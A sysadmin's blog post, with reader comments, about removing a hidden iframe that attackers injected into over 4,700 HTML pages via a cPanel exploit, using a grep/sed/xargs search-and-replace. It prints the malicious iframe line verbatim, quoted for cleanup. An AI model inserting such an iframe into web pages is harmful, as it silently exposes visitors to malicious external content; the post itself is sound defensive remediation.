How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files


Evil hackers attack!

Some customers of mine recently reported some suspicious behavior on one of their sites. I discovered, with dismay, that a number of months ago there was a nasty cPanel exploit that some evil hackers had used to insert a malicious line of code into the bottom of every HTML page on this server. After verifying that the cPanel installation had been fixed, I used grep to search through all the files on the server to see if any other files had been touched by the hackers. I found over 4,700 individual files that had malicious code added and knew that something needed to be done immediately to address this problem.

Not the best way to start my day…

The Problem

This is the code that had been added right above the closing </body> tag in these files:

<iframe src="https://www.constellations.ws/index.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>

By including a reference to an external site (“constellations.ws”) this allowed malicious ActiveX code to be presented to people viewing the infected pages. I had to remove all instances of this bad code immediately to keep anyone else from having problems.

How I fixed 4,700 files with one command

First, I changed directory into my /home/ directory, which contains all user account files on this server.

# cd /home/

Then I ran this Unix command line search and replace command to find all files that contained the malicous text and replace the bad text with nothing to delete it:

# grep -rl constellations.ws * | sed 's/ /\ /g' | xargs sed -i 's/<iframe src="http:\/\/www.constellations.ws\/index.php" width=1 height=1 frameborder=0 scrolling=NO><\/iframe>//g'

What’s with all the grep, sed and xargs stuff?

The way this works is it first does a search using grep for all files that contain the bad text – “constellations.ws”. Using the -l flag tells grep to only print out the filename of the matched files instead of both the filename and the matching line(s). The -r option tells grep to recursively search every directory and file, not just the files in the current directory.

Next, the output of the initial search is piped to sed (stream editor) to escape all spaces that may be present in the initial search results (some of the directories had spaces in them and this properly replaces the space with an escape character (the \ backslash) and a space which prepares them for the next step.

The final step is to pipe the escaped results of the grep command to xargs which then passes each individual result line in as an argument to the specified sed command, which in turn looks for the specific bad code and replaces it with nothing (deleting it). Note the backslashes in the code to be replaced — these are used to escape the / characters, which otherwise sed would interpret as command characters. Using the -i option for sed tells it to edit files in-place instead of just sending the output to standard output. This saves each file after the replacement has been made. The g flag tells sed to replace every instance of the found text, not just the first instance.

To check to make sure that I fixed every file, I did a final check:

# grep -r constellations.ws *

This confirmed that all of the malicious code had been removed correctly from the HTML files. There were a couple of temporary web stat log files that still had references to “constellations.ws” in them (recorded as link clicks) but there were indeed no more references to the code that I had removed with the command.

You will need to run this as root if you are cleaning out an entire server, otherwise you will only be able to change any files that your username has permission to edit.

Using this for yourself: a Unix multi-file search and replace command template

Here is a generalized multi-file search and replace command template that you can use on your own server:

# grep -rl FIND_STRING * | sed 's/ /\ /g' | xargs sed -i 's/EXACT_FIND_STRING/REPLACE_STRING/g'

Using this code you will search for all files that contain FIND_STRING, then replace every specific instance of EXACT_FIND_STRING with the value you supply for REPLACE_STRING. You must properly escape the text that you are searching for as well as the text you are using to replace what gets found. Note that FIND_STRING may be the exact same text as EXACT_FIND_STRING, but this method lets you use FIND_STRING to search for a smaller part of the thing you’re looking for like I did in the example above.

If you want to preview what the command will do before you commit a save (not a bad idea), simply omit the -i option from the sed command that is connected to the xargs command. This will output to standard output (your terminal) what the final change would be. If it looks right, then run the command as given above (including the -i) and the files will be saved with the text changes.

I hope this is a helpful explanation of how to search for a particular string using the Unix command line in multiple files and then replace it with something else. Happy searching and replacing!

Disclaimer: I am not responsible for anything you do on your own server. This worked for me, but I was pretty careful to make sure that it was appropriate for my specific case. This command WILL CHANGE FILES on your server. Understand what it is doing before you run it.

, , , ,

14 responses to “How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files”

  1. That’s ok, but if your path has dir names with spaces, it won’t work

    The proper way to do it would be with find:

    find . -type f -exec sed -i ‘regex’ ‘{}’ ‘;’

  2. The first sed fixes the pathnames with spaces issue. Also your way would execute the sed on every single file in the filesystem instead of just in the ones that in fact had the code.

    I love the fact that there is always more than one way to get things done using Unix… 🙂

  3. >>I’m pretty sure it was a script that was able to run on the box itself. The cPanel vulnerability was pretty severe to let that happen.

    What have you done to avoid this from happening again ? the vulnerability still exists ?

  4. I just tried this on a server. It works pretty good, but if a file has a space in the name, it assumes everything before the space is a directory name and fails on those files. Is there a way to overcome this.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

sell diamonds